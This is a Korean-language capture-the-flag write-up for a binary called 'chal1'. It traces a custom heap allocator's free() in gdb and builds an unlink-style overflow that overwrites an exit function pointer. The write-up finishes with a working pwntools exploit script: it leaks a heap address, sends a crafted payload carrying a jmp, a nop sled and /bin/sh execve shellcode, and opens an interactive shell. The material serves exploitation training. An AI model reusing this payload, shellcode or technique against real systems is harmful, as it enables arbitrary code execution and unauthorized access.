휘원선배님께서 내주신 과제!!
일단, gdb 속에서 확인을 해봅시다
0xbfffe440이 get_my_line의 인자로 들어간다.
memcpy의 인자 0x0804e2c8 0xbfffe440 64
0x804e2c8에 써지기 시작합니다. 0x804f148에도 써지기 시작함!!!!
exit: 0x804c8c8(이건 언제나 동일)
위 그림처럼 출력되는 부분을 확인해보자
0 804d008 4de(1246) 1256(1주소-0주소)
1 804d4f0 461(1121) 1128(2주소-1주소)
2 804d958 3b3(947) 952
3 804dd10 2e5(741) 752
4 804e000 2c2(706) 712
5 804e2c8 12c(300) 304
6 804e3f8 2a1(673) 680
7 804e6a0 3ec(1004) 1008
8 804ea90 3b8(952) 960
9 804ee50 2f3(755) 760
저 크기들이 malloc이 이루어지면 박힌다!!
0x804d004에 4e9 1257
0x804d4ec에 469 1129
0x804d954에 3b9 953
0x804dd0c에 2f1 753
0x804dffc에 2c9 713
0x804e2c4에 131 305
0x804e3f4에 2a9 681
0x804e69c에 3f1 1009
0x804ea8c에 3c1 961
0x804ee4c에 2f9 761
0x804f144에 1009 (원래는 1ebd)
0x804e2c8부터 바뀌기 때문에 저 빨간부분들이 문제가 된다.
일단 a를 300개보다 많은 400개를 넣어서 어디가 문제가 되는지 살펴보자.
0x8049344 <free+17>: mov eax,DWORD PTR [ebp+0x8]: eax=0x804e2c8
0x8049347 <free+20>: sub eax,0x4: eax=0x804e2c4
0x804934a <free+23>: mov DWORD PTR [ebp-0xc],eax: 0xbfffe0fc= 0x804e2c4
0x804934d <free+26>: mov eax,DWORD PTR [ebp-0xc]: eax=0x804e2c4
0x8049350 <free+29>: mov eax,DWORD PTR [eax]: eax=0x130(0x804e2c4에 적혀있던)
0x8049352 <free+31>: and eax,0xfffffffe
0x8049355 <free+34>: mov DWORD PTR [ebp-0x10],eax: 0xbfffe0f8=0x130
0x8049358 <free+37>: mov eax,DWORD PTR [ebp-0xc]: eax=0x804e2c4
0x804935b <free+40>: mov eax,DWORD PTR [eax]: eax=0x130
0x804935d <free+42>: and eax,0x1:
0x8049360 <free+45>: test eax,eax
0x8049362 <free+47>: jne 0x80493ad <free+122>
0x8049364 <free+49>: mov eax,DWORD PTR [ebp-0xc] eax=0x804e2c4
0x8049367 <free+52>: sub eax,0x4: eax=0x804e2c0
0x804936a <free+55>: mov eax,DWORD PTR [eax]: eax=0x12c0
0x804936c <free+57>: neg eax: eax=0xffffed40
0x804936e <free+59>: mov edx,eax: edx=0xffffed40
0x8049370 <free+61>: mov eax,DWORD PTR [ebp-0xc]: eax=0x804e2c4
0x8049373 <free+64>: add eax,edx: eax=0x804d004
0x8049375 <free+66>: mov DWORD PTR [ebp-0x14],eax: 0xbfffe0f4=0x804d004
0x8049378 <free+69>: mov eax,DWORD PTR [ebp-0x14]: eax=0x804d004
0x804937b <free+72>: mov eax,DWORD PTR [eax]: eax=0x12c1
0x804937d <free+74>: and eax,0xfffffffe: eax=0x12c0
0x8049380 <free+77>: add DWORD PTR [ebp-0x10],eax: 0xbfffe0f8=0x12c0+0x130=0x13f0
0x8049383 <free+80>: mov eax,DWORD PTR [ebp-0x14]: eax=0x804d004
0x8049386 <free+83>: mov eax,DWORD PTR [eax+0x8]: eax=0x804c6c0(0x804d00c에 적혀있던)
0x8049389 <free+86>: mov DWORD PTR [ebp-0x18],eax: 0xbfffe0f0=0x804c6c0
0x804938c <free+89>: mov eax,DWORD PTR [ebp-0x14]: eax=0x804d004
0x804938f <free+92>: mov eax,DWORD PTR [eax+0x4]: eax=0x804c6c0(804d008에 적혀있던)
0x8049392 <free+95>: mov DWORD PTR [ebp-0x1c],eax: 0xbfffe0ec=0x804c6c0
0x8049395 <free+98>: mov eax,DWORD PTR [ebp-0x1c]: eax=0x804c6c0
0x8049398 <free+101>: mov edx,DWORD PTR [ebp-0x18]: edx=0x804c6c0
0x804939b <free+104>: mov DWORD PTR [eax+0x8],edx: 0x804c6c8=0x804c6c0
0x804939e <free+107>: mov eax,DWORD PTR [ebp-0x18]: eax=0x804c6c0(0xbfffe0f0에 적혀있던)
0x80493a1 <free+110>: mov edx,DWORD PTR [ebp-0x1c]: edx=0x804c6c0(0xbfffe0ec에 적혀있던)
0x80493a4 <free+113>: mov DWORD PTR [eax+0x4],edx: 0x804c6c4=0x804c6c0
0x80493a7 <free+116>: mov eax,DWORD PTR [ebp-0x14]: eax=0x804d004(0xbfffe0f4에 적혀있던)
0x80493aa <free+119>: mov DWORD PTR [ebp-0xc],eax: 0xbfffe0fc=0x804d004
0x80493ad <free+122>: mov eax,DWORD PTR [ebp-0x10]: eax=0x13f0(0xbfffe0f8에 적혀있던)
0x80493b0 <free+125>: mov edx,DWORD PTR [ebp-0xc]: edx=0x804d004
0x80493b3 <free+128>: add eax,edx: eax=0x804e3f4(0x804d004+13f0)
0x80493b5 <free+130>: mov DWORD PTR [ebp-0x20],eax: 0xbfffe0e8=0x804e3f4
0x80493b8 <free+133>: mov eax,ds:0x804c084: eax=0x804f54c(0x804c084에 적힌)
0x80493bd <free+138>: cmp eax,DWORD PTR [ebp-
0x80493c0 <free+141>: jne 0x80493f9 <free+198>
0x80493c2 <free+143>: mov eax,DWORD PTR [ebp-0x20]
0x80493f9 <free+198>: mov eax,DWORD PTR [ebp-0x10]: eax=13f0(0xbfffe0f8에 적힌)
0x80493fc <free+201>: mov edx,DWORD PTR [ebp-0xc]: edx=0x804d004(0xbfffe0fc에 적힌)
0x80493ff <free+204>: add eax,edx eax=0x804e3f4(0x804d004+0x13f0)
0x8049401 <free+206>: mov edx,DWORD PTR [ebp-0x10]: edx=0x13f0(0xbfffe0f8에 적힌)
0x8049404 <free+209>: mov ecx,DWORD PTR [ebp-0xc]: ecx=0x804d004(0xbfffe0fc에 적힌)
0x8049407 <free+212>: add edx,ecx edx=0x804e3f4(0x13f0+0x804d004)
0x8049409 <free+214>: mov edx,DWORD PTR [edx]: edx=0x804e3f4에 적힌 AAAA
0x804940b <free+216>: and edx,0xfffffffe: edx=0x61616160
0x804940e <free+219>: mov DWORD PTR [eax],edx: 0x804e3f4=0x61616160
0x8049410 <free+221>: mov eax,DWORD PTR [ebp-0x20]: eax=0x804e3f4(0xbfffe0e8에 적힌)
0x8049413 <free+224>: mov eax,DWORD PTR [eax]: eax= 0x61616160(0x804e3f4에 적힌)
0x8049415 <free+226>: and eax,0xfffffffe eax=0x61616160
0x8049418 <free+229>: mov edx,eax: edx=0x61616160
0x804941a <free+231>: mov eax,DWORD PTR [ebp-0x20]: eax=0x804e3f4(0xbfffe0e8에 적힌)
0x804941d <free+234>: add eax,edx: eax=0x69664554
0x804941f <free+236>: mov eax,DWORD PTR [eax]
0x8049421 <free+238>: and eax,0x1
0x8049424 <free+241>: test eax,eax
0x8049426 <free+243>: jne 0x8049457 <free+292>
원래는0x804e3f4에 0x2a9가 적혀있다.
그래서, eax=0x804e3f4, edx=0x2a8
eax=0x804e69c(0x804e3f4+0x2a8)
0x804941f <free+236>: mov eax,DWORD PTR [eax]: eax=0x3f1(0x804e69c에 적힌)
0x8049421 <free+238>: and eax,0x1: eax=1
0x8049424 <free+241>: test eax,eax
0x8049426 <free+243>: jne 0x8049457 <free+292>
0x8049457 <free+292>: mov eax,DWORD PTR [ebp-0xc]: eax=0x804d004(0xbfffe0fc에 적힌)
0x804945a <free+295>: mov eax,DWORD PTR [eax]: eax=0x12c1(0x804d004에 적힌)
0x804945c <free+297>: and eax,0x1: eax=1
0x804945f <free+300>: or eax,DWORD PTR [ebp-0x10]: (0xbfffe0f8에 적힌 0x13f0)eax=13f1
0x8049462 <free+303>: mov edx,eax: edx=13f1
0x8049464 <free+305>: mov eax,DWORD PTR [ebp-0xc]: eax=0x804d004(0xbfffe0fc에 적힌)
0x8049467 <free+308>: mov DWORD PTR [eax],edx: 0x804d004:13f1
0x8049469 <free+310>: mov eax,DWORD PTR [ebp-0x10]: eax=13f0(0xbfffe0f8에 적힌)
0x804946c <free+313>: lea edx,[eax-0x4]: edx=13ec
0x804946f <free+316>: mov eax,DWORD PTR [ebp-0xc]: eax=0x804d004
0x8049472 <free+319>: add edx,eax: edx=0x804e3f0(0x804d004+0x13ec)
0x8049474 <free+321>: mov eax,DWORD PTR [ebp-0x10]: eax=13f0(0xbfffe0f8에 적힌)
0x8049477 <free+324>: mov DWORD PTR [edx],eax: 0x804e3f0=0x13f0
0x8049479 <free+326>: mov eax,DWORD PTR [ebp-0x10]: eax=0x13f0(0xbfffe0f8에 적힌)
0x804947c <free+329>: shr eax,0x9: eax=0x9
0x804947f <free+332>: test eax,eax
0x8049481 <free+334>: jne 0x804948b <free+344>
0x8049483 <free+336>: mov eax,DWORD PTR [ebp-0x10]
0x8049486 <free+339>: shr eax,0x3
0x8049489 <free+342>: jmp 0x8049502 <free+463>
0x804948b <free+344>: mov eax,DWORD PTR [ebp-0x10]: eax=0x13f0(0xbfffe0f8에 적힌)
0x804948e <free+347>: shr eax,0x9: eax=0x9
0x8049491 <free+350>: cmp eax,0x4
0x8049494 <free+353>: ja 0x80494a1 <free+366>
0x8049496 <free+355>: mov eax,DWORD PTR [ebp-0x10]
0x80494a1 <free+366>: mov eax,DWORD PTR [ebp-0x10]: eax=0x13f0(0xbfffe0f8에 적힌)
0x80494a4 <free+369>: shr eax,0x9: eax=0x9
0x80494a7 <free+372>: cmp eax,0x14
0x80494aa <free+375>: ja 0x80494b7 <free+388>
0x80494ac <free+377>: mov eax,DWORD PTR [ebp-0x10]: eax=0x13f0(0xbfffe0f8에 적힌)
0x80494af <free+380>: shr eax,0x9: eax=0x9
0x80494b2 <free+383>: add eax,0x5b: eax=0x64
0x80494b5 <free+386>: jmp 0x8049502 <free+463>
0x80494b7 <free+388>: mov eax,DWORD PTR [ebp-0x10]
0x8049502 <free+463>: mov DWORD PTR [ebp-0x2c],eax: 0xbfffe0dc=0x64
0x8049505 <free+466>: mov edx,DWORD PTR ds:0x804c080: edx=0x3840000(0x804c080에 적힌)
0x804950b <free+472>: mov eax,DWORD PTR [ebp-0x2c]:eax=0x64(0xbfffe0dc에 적힌)
0x804950e <free+475>: lea ecx,[eax+0x3]: ecx=0x67
0x8049511 <free+478>: test eax,eax
0x8049513 <free+480>: cmovs eax,ecx
0x8049516 <free+483>: sar eax,0x2: eax=0x19
0x8049519 <free+486>: mov ebx,0x1: ebx=0x1
0x804951e <free+491>: mov ecx,eax: ecx=0x19
0x8049520 <free+493>: shl ebx,cl: ebx=0x2000000
0x8049522 <free+495>: mov eax,ebx: eax=0x2000000
0x8049524 <free+497>: or eax,edx: eax=0x3840000
0x8049526 <free+499>: mov ds:0x804c080,eax
0x804952b <free+504>: mov eax,DWORD PTR [ebp-0x2c]: eax=0x64(0xbfffe0dc에 적힌)
0x804952e <free+507>: shl eax,0x4: eax=0x640
0x8049531 <free+510>: add eax,0x804c080: eax=0x804c6c0
0x8049536 <free+515>: mov DWORD PTR [ebp-0x30],eax: 0xbfffe0d8=0x804c6c0
0x8049539 <free+518>: mov eax,DWORD PTR [ebp-0x30]: eax=0x804c6c0(0xbfffe0d8에 적힌)
0x804953c <free+521>: mov eax,DWORD PTR [eax+0x4]: eax=0x804c6c0(0x804c6c4에 적힌)
0x804953f <free+524>: mov DWORD PTR [ebp-0x34],eax: 0xbfffe0d4=0x804c6c0
0x8049542 <free+527>: mov eax,DWORD PTR [ebp-0xc]: eax=0x804d004
0x8049545 <free+530>: mov edx,DWORD PTR [ebp-0x30]: edx=0x804c6c0(0xbfffe0d8에 적힌)
0x8049548 <free+533>: mov DWORD PTR [eax+0x8],edx: 0x804d00c=0x804c6c0
0x804954b <free+536>: mov eax,DWORD PTR [ebp-0xc]: eax=0x804d004(0xbfffe0fc에 적힌)
0x804954e <free+539>: mov edx,DWORD PTR [ebp-0x34]: edx=0x804c6c0(0xbfffe0d4에 적힌)
0x8049551 <free+542>: mov DWORD PTR [eax+0x4],edx: 0x804d008=0x804c6c0
0x8049554 <free+545>: mov eax,DWORD PTR [ebp-0x30]: eax=0x804c6c0(0xbfffe0d8에 적힌)
0x8049557 <free+548>: mov edx,DWORD PTR [ebp-0xc]: edx=0x804d004(0xbfffe0fc에 적힌)
0x804955a <free+551>: mov DWORD PTR [eax+0x4],edx:0x804c6c4=0x804d004
0x804955d <free+554>: mov eax,DWORD PTR [ebp-0x30]:eax=0x804c6c0(0xbfffe0d8에 적힌)
0x8049560 <free+557>: mov edx,DWORD PTR [eax+0x4]: edx=0x804d004(0x804c6c4에 적힌)
0x8049563 <free+560>: mov eax,DWORD PTR [ebp-0x34]: eax=0x804c6c0(0xbfffe0d4에 적힌)
0x8049566 <free+563>: mov DWORD PTR [eax+0x8],edx: 0x804c6c8=0x804d004
0x8049569 <free+566>: add esp,0x34
0x804956c <free+569>: pop ebx
0x804956d <free+570>: pop ebp
0x804956e <free+571>: ret
ebp는
0xbfffe108:0xbffff458
즉, free끝나면 0xbffff458로 돌아온다.
free의 ret을 덮어쓰는 건 불가능!!! 여기서 esp는 0xbfffe10c, but 덮어씌워지는 부분은 0xbfffe440
[-------------------------------------code-------------------------------------]
0x8048b1f <main+479>: cmp DWORD PTR [esp+0x133c],0x9
0x8048b27 <main+487>: jbe 0x8048ae9 <main+425>
0x8048b29 <main+489>: mov eax,ds:0x804c8c8
0x8048b2e <main+494>: mov DWORD PTR [esp],0x1
0x8048b35 <main+501>: call eax
0x8048b37 <main+503>: mov eax,0x0
0x8048b3c <main+508>: leave
0x8048b3d <main+509>: ret
main의 ret을 덮을까?를 생각 중,
main+489지점에서 eax=0x804c8c8이 되고,
0x804c8c8이 가리키는 부분이 0x8048910(do_exit)
but, 0804c000-0804d000 rw-p 00003000 08:01 2359949 /root/Desktop/chal1
즉, 0x804c8c8은 write할 수 있으므로, 쉘코드가 들어있는 부분을 실행해보자.
그런데, 여기까지 내려오려면, 중간에 세폴이 뜨지 않아야 한다.
중간에 세폴이 뜨지 않게, 세폴이 뜨는 이유를 찾아 조절해보자.
즉, 중간에
0x804e3f4에 2a9
0x804e69c에 3f1
0x804ea8c에 3c1
0x804ee4c에 2f9
0x804f144에 1009 (malloc직후에는 1ebd)
일단, 진행이 되어야 하므로,
(python -c 'print
"a"*300+"\xa9\x02\x00\x00"+"a"*676+"\xf1\x03\x00\x00"+"a"*1004+"\xc1\x03\x00\x00"+"a"*956+"\xf9\x02\x00\x00"+"a"*756+"\x09\x10\x00\x00"')|./chal1
이제, 마지막 것을 조절해보자. \x09\x10\x00\x00 말고 다른 걸 넣어보자.
0x804941a <free+231>: mov eax,DWORD PTR [ebp-0x20]
0x804941d <free+234>: add eax,edx
0x804941f <free+236>: mov eax,DWORD PTR [eax]
0x8049421 <free+238>: and eax,0x1
0x8049424 <free+241>: test eax,eax
0x8049426 <free+243>: jne 0x8049457 <free+292>
0x0804941a <+231>: mov eax,DWORD PTR [ebp-0x20]
0x0804941d <+234>: add eax,edx
0x0804941f <+236>: mov eax,DWORD PTR [eax]
0x08049421 <+238>: and eax,0x1
0x08049424 <+241>: test eax,eax
0x08049426 <+243>: jne 0x8049457 <free+292>
0x08049428 <+245>: mov eax,DWORD PTR [ebp-0x20]
0x0804942b <+248>: mov eax,DWORD PTR [eax]
0x0804942d <+250>: and eax,0xfffffffe
0x08049430 <+253>: add DWORD PTR [ebp-0x10],eax
0x08049433 <+256>: mov eax,DWORD PTR [ebp-0x20]
0x08049436 <+259>: mov eax,DWORD PTR [eax+0x8]
0x08049439 <+262>: mov DWORD PTR [ebp-0x24],eax
0x0804943c <+265>: mov eax,DWORD PTR [ebp-0x20]
0x0804943f <+268>: mov eax,DWORD PTR [eax+0x4]
0x08049442 <+271>: mov DWORD PTR [ebp-0x28],eax
0x08049445 <+274>: mov eax,DWORD PTR [ebp-0x28]
0x08049448 <+277>: mov edx,DWORD PTR [ebp-0x24]
0x0804944b <+280>: mov DWORD PTR [eax+0x8],edx
0x0804944e <+283>: mov eax,DWORD PTR [ebp-0x24]
0x08049451 <+286>: mov edx,DWORD PTR [ebp-0x28]
0x08049454 <+289>: mov DWORD PTR [eax+0x4],edx
0x08049457 <+292>: mov eax,DWORD PTR [ebp-0xc]
ebp-0x28에 적히는 걸: A, ebp-0x24에 적히는걸: B라고 하자
파란부분에서 A+8부분에<-B
초록부분에서 B+4부분에<-A
A는 eax+0x4에 적힌거, B는 eax+0x8에 적힌거
A에 쉘코드 박히는 0x804ffd0를 넣고, B에 0x804c8c4를 넣자.
r < <(python -c 'print "a"*300+"\xa9\x02\x00\x00"+"a"*676+"\xf1\x03\x00\x00"+"a"*1004+"\xc1\x03\x00\x00"+"a"*956+"\xf9\x02\x00\x00"+"a"*756+"\x07\x10\x00\x00"+"\xd0\xff\x04\x08"+"\xc4\xc8\x04\x08"+"\xe9\x08\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x90\x90\x90\x90\x90\x90"')
0x804c8c8에 쉘코드 시작부분이 들어가게 된다.
하지만 쉘코드 부분에 0x804c8c4가 들어가서 망가지게 되므로,
처음에 jmp를 써서 쉘코드 내부에서 저 망가지는 부분을 뛰어넘게 만든다.
jmp \xe9이고, 몇 바이트 뛰어넘을지는 해보면 쉽게 구할 수 있다.
쉘코드에 jmp를 넣는것을 찾는게 참 어려웠다ㅜㅜㅜㅜㅜ
처음에 0x804d008일 때, 0x804ffd0을 넣어줬으니,
처음 leak한 것에 12232를 더한 것을 넣어주면 된다!!
# PoC script for the custom-allocator free() walk analysed above (pwntools, Python 2:
# str literals are raw bytes here, which the "\x.." escapes and p32() rely on).
# Each size field below restores the value the free() loop reads at that offset,
# so the walk reaches the chunk whose +4/+8 words are written back by the unlink.
from pwn import*
# NOTE(review): target host/port are the local challenge instance used in the writeup.
s=remote('localhost',6666)
# The service prints the address of the first chunk after "loc="; 7 hex digits are read.
s.recvuntil("loc=")
address=s.recv(7)
# 12232 == 0x804ffd0 - 0x804d008: offset from the leaked first-chunk address to the
# location where the tail of the payload (the jmp + shellcode bytes) ends up.
new_address=hex(int(address,16)+12232)
s.recvuntil("size=300]:")
payload=''
# Fill the 300-byte chunk, then rewrite the size words of the following chunks
# (0x2a9, 0x3f1, 0x3c1, 0x2f9) with the values observed after malloc so the
# consolidation loop does not fault before reaching the last chunk.
payload+="a"*300
payload+="\xa9\x02\x00\x00"
payload+="a"*676
payload+="\xf1\x03\x00\x00"
payload+="a"*1004
payload+="\xc1\x03\x00\x00"
payload+="a"*956
payload+="\xf9\x02\x00\x00"
payload+="a"*756
# Last size word is 0x1007 rather than the 0x1009 observed after malloc (see the
# free+231..free+243 branch above, which keys on bit 0 of the size it reaches).
payload+="\x07\x10\x00\x00"
# A (read from chunk+4) and B (read from chunk+8): free() does *(B+4) = A, so
# B = 0x804c8c4 makes 0x804c8c8 -- the pointer main calls at main+501 -- point at A.
payload+=p32(int(new_address,16))
payload+="\xc4\xc8\x04\x08"
# Leading \xe9 is a relative jmp over the bytes that the unlink write clobbers
# (see the note above), followed by a nop sled and the shellcode.
payload+="\xe9\x08\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x90\x90\x90\x90\x90\x90"
payload+="\n"
s.send(payload)
s.interactive()
s.close()